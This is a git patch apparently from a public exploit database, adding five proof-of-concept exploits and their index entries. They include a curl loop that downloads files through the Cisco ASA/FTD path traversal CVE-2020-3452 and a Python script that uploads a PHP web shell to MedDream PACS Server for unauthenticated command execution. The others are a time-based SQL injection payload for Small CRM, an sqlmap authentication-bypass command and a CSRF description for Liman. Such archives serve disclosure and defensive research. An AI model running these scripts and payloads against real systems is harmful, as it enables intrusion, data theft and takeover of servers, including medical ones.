From 14fcd4863ffe7100decfcb1175c939b16ec5032d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 13 Oct 2020 05:02:09 +0000 Subject: [PATCH] DB: 2020-10-13 5 changes to exploits/shellcodes Small CRM 2.0 - 'email' SQL Injection MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) Liman 0.7 - Cross-Site Request Forgery (Change Password) Online Students Management System 1.0 - 'username' SQL Injections Cisco ASA and FTD 9.6.4.42 - Path Traversal --- exploits/hardware/webapps/48871.txt | 25 +++++++ exploits/multiple/webapps/48869.txt | 64 +++++++++++++++++ exploits/php/webapps/48867.txt | 41 +++++++++++ exploits/php/webapps/48868.py | 103 ++++++++++++++++++++++++++++ exploits/php/webapps/48870.txt | 51 ++++++++++++++ files_exploits.csv | 5 ++ 6 files changed, 289 insertions(+) create mode 100644 exploits/hardware/webapps/48871.txt create mode 100644 exploits/multiple/webapps/48869.txt create mode 100644 exploits/php/webapps/48867.txt create mode 100755 exploits/php/webapps/48868.py create mode 100644 exploits/php/webapps/48870.txt diff --git a/exploits/hardware/webapps/48871.txt b/exploits/hardware/webapps/48871.txt new file mode 100644 index 000000000..9cd3cfbb3 --- /dev/null +++ b/exploits/hardware/webapps/48871.txt @@ -0,0 +1,25 @@ +# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal +# Date: 2020-10-10 +# Exploit Author: 3ndG4me +# Vendor: www.cisco.com +# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html +# CVE : CVE-2020-3452 + + + +TARGET=$1 +CISCO_KNOWN_FILES="logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen" +mkdir cisco_asa_files + +if [ -z "$1" ]; +then + echo "Usage: cve-2020-3452.sh " + echo "Example: cve-2020-3452.sh mytarget.com" + echo "Files that are downloaded will be in the newly created 'cisco_asa_files' directory" + echo "Target not specificed...exiting..." +else + for FILE in $CISCO_KNOWN_FILES; + do + curl "https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../" | tee cisco_asa_files/$FILE; + done +fi \ No newline at end of file diff --git a/exploits/multiple/webapps/48869.txt b/exploits/multiple/webapps/48869.txt new file mode 100644 index 000000000..1e983f8a6 --- /dev/null +++ b/exploits/multiple/webapps/48869.txt @@ -0,0 +1,64 @@ +# Exploit Title: Liman 0.7 - Cross-Site Request Forgery (Change Password) +# Date: 2020-10-07 +# Exploit Author: George Tsimpidas +# Software Link : https://github.com/salihciftci/liman/releases/tag/v0.7 +# Version: 0.7 +# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) +# Category: Webapp + +Description: + +There is no CSRF protection in Liman application, with a little help +of social engineering (like sending a link via email/chat) an attacker may +force the victim to click on a malicious link, with the purpose of +manipulating his current account information, or changing entirely his +password. + +Vulnerable Endpoints : + +http://127.0.0.1:5000/settings/profile +http://127.0.0.1:5000/settings/password + +Proof of Concept + + +Download the application, make an account and login inside the +panel under : http://127.0.0.1:5000 expose the docker port on 5000. + + +Save this .html files and send it to victim (Victim should be +logged in in the browser) + +Crafted value will be added. + +Account Information CSRF : + + + + + +
+ + + + + + + + +Password Change CSRF : + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/48867.txt b/exploits/php/webapps/48867.txt new file mode 100644 index 000000000..e07bfb8af --- /dev/null +++ b/exploits/php/webapps/48867.txt @@ -0,0 +1,41 @@ +# Exploit Title: Small CRM 2.0 - 'email' SQL Injection +# Google Dork: N/A +# Date: 2020-10-10 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/small-crm-php/ +# Version: V2.0 +# Tested on: Kali Linux +# CVE : N/A + +========== Vulnerable Code ========== + +mysqli_query $row1 = mysqli_query($con, "select email,password from user +where email='" . $_POST['email'] . "'"); // dbconnection.php + +========== Post Request ==================== + +POST /crm/forgot-password.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 +Firefox/68.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: localhost/crm/forgot-password.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 20 +Connection: close +Cookie: __test=ec283e73906679549573af64209a5d5b; +PHPSESSID=4d272f5938b3ec9c60bb45c4d7b44497 +Upgrade-Insecure-Requests: 1 + +email=test@test.com&submit= + +============= Vulnerable Parameter =============== + +email (POST) + +============= Payload ========================= + +' AND (SELECT 1543 FROM (SELECT(SLEEP(5)))gSRd) AND 'PCOX'='PCOX \ No newline at end of file diff --git a/exploits/php/webapps/48868.py b/exploits/php/webapps/48868.py new file mode 100755 index 000000000..9a12154ec --- /dev/null +++ b/exploits/php/webapps/48868.py @@ -0,0 +1,103 @@ +#!/usr/bin/python +# +# Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated) +# Exploit Author: bzyo +# Twitter: @bzyo_ +# Date: 10-10-2020 +# Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ +# Vendor Homepage: https://www.softneta.com +# Version: 6.8.3.751 +# Tested On: Windows 2016 +# +# +# Update to EB 48853 < AUTHENTICATION WAS NOT NEEDED LOLZ +# +##PoC## +# +# 1. create one line php shell to call commands +# 2. run script on attacking machine +# 3. enter parameters; IP, filename, command +# +# +# root@kali:~# python meddream.py +# Enter IP Address: 192.168.0.223 +# Enter payload filename + .php: cmd.php +# Enter command: whoami +# 170759 +# 
nt authority\system
+#
+# http://192.168.0.223/Pacs/upload/20201010-170759--cmd.php?cmd=whoami +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# 404 +# +# + +from urllib2 import urlopen +import requests +import sys +import time +from datetime import datetime, timedelta + +ip_addr = raw_input("Enter IP Address: ") +user_file = raw_input("Enter payload filename + .php: ") +cmd = raw_input("Enter command: ") + +URL= 'http://' + ip_addr + '/Pacs/uploadImage.php' + +def main(): + session = requests.Session() + + files = [ + ('actionvalue', (None, 'Attach', None)), + ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), + ('action', (None, 'Attach', None)), + ] + + site = session.post(URL, files=files) + + today = datetime.today() + upload_date = today.strftime("%Y%m%d") + + less = 1 + now1 = datetime.now() + up_time1 = now1.strftime("%H%M%S") + print(up_time1) + #varying time checks +/- + now2 = now1 - timedelta(seconds=less) + up_time2 = now2.strftime("%H%M%S") + now3 = now2 - timedelta(seconds=less) + up_time3 = now3.strftime("%H%M%S") + now4 = now3 - timedelta(seconds=less) + up_time4 = now4.strftime("%H%M%S") + now5 = now4 - timedelta(seconds=less) + up_time5 = now5.strftime("%H%M%S") + now6 = now5 - timedelta(seconds=less) + up_time6 = now6.strftime("%H%M%S") + now7 = now6 - timedelta(seconds=less) + up_time7 = now7.strftime("%H%M%S") + now8 = now1 + timedelta(seconds=less) + up_time8 = now8.strftime("%H%M%S") + now9 = now8 + timedelta(seconds=less) + up_time9 = now8.strftime("%H%M%S") + now10 = now1 + timedelta(seconds=less) + up_time10 = now9.strftime("%H%M%S") + + + up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] + for i in up_time_array: + r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) + if r.status_code == 200: + print r.content + print r.url + else: + print ("404") + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/48870.txt b/exploits/php/webapps/48870.txt new file mode 100644 index 000000000..64f107795 --- /dev/null +++ b/exploits/php/webapps/48870.txt @@ -0,0 +1,51 @@ +# Title: Online Students Management System 1.0 - 'username' SQL Injections +# Exploit Author: George Tsimpidas +# Date: 2020-10-09 +# Vendor Homepage: www.sourcecodester.com +# Software Link: +https://www.sourcecodester.com/sites/default/files/download/janobe/studentrecord_0.zip +# Version : 1.0 +# Tested on: Ubuntu 18.04.5 LTS (Bionic Beaver) +# Category: Webapp + +# Description + +The files index.php on the main login page, and the index.php on the +/admin/ login page does not perform input validation on the regno +and username parameters. An attacker can send malicious input in the post +request to http://localhost/index.php or either +http://localhost/admin/index.php and bypass authentication, extract +sensitive information etc. + +#POC + +1) Navigate to the admin login page + +Example: + +http://localhost/admin/index.php + +2) Fill in dummy values for 'username' and 'password' fields and send the +request via an HTTP intercept tool + +3) Save the request to file. Example, student_record_sqli.req + +POST /admin/index.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 32 +Origin: http://localhost +DNT: 1 +Connection: close + +username=admin&password=dummy + +4) Run SQLmap on the file, + +sqlmap -r student_record_sqli.req --dbms=mysql --threads=10 -p username \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b5f7176d9..64458a210 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -40685,6 +40685,11 @@ id,file,description,date,author,type,platform,port 48864,exploits/php/webapps/48864.txt,"Kentico CMS 9.0-12.0.49 - Persistent Cross Site Scripting",2020-10-09,"Ataberk YAVUZER",webapps,php, 48865,exploits/php/webapps/48865.txt,"DynPG 4.9.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-09,"Enes Özeser",webapps,php, 48866,exploits/json/webapps/48866.txt,"openMAINT 1.1-2.4.2 - Arbitrary File Upload",2020-10-09,mrb3n,webapps,json, +48867,exploits/php/webapps/48867.txt,"Small CRM 2.0 - 'email' SQL Injection",2020-10-12,"Ahmet Ümit BAYRAM",webapps,php, +48868,exploits/php/webapps/48868.py,"MedDream PACS Server 6.8.3.751 - Remote Code Execution (Unauthenticated)",2020-10-12,bzyo,webapps,php, +48869,exploits/multiple/webapps/48869.txt,"Liman 0.7 - Cross-Site Request Forgery (Change Password)",2020-10-12,"George Tsimpidas",webapps,multiple, +48870,exploits/php/webapps/48870.txt,"Online Students Management System 1.0 - 'username' SQL Injections",2020-10-12,"George Tsimpidas",webapps,php, +48871,exploits/hardware/webapps/48871.txt,"Cisco ASA and FTD 9.6.4.42 - Path Traversal",2020-10-12,3ndG4me,webapps,hardware, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,